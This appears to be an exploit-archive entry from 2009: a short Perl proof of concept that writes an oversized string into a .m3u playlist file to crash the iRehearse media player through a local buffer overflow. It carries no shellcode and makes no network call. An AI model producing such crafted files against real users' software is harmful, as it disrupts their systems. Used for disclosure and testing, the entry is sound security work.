id: 6959
date: 08/06/2009
title: iRehearse (.m3u File) Local Buffer Overflow PoC
author: opt!x hacker
cves: 

===============================================
iRehearse (.m3u File) Local Buffer Overflow PoC
===============================================


#!/usr/bin/perl
#iRehearse (m3u) local stack overlow POC
#finded by opt!x hacker  
#download : http://rjvmedia.co.uk/software/iRehearseTrial.zip
my $header="MILW0RM";
my $crash="A" x 40;
my $poc=$header.$crash;
open(myfile,'>>aidi.m3u');
print myfile $poc;



#  0day.today [2023-03-27]  #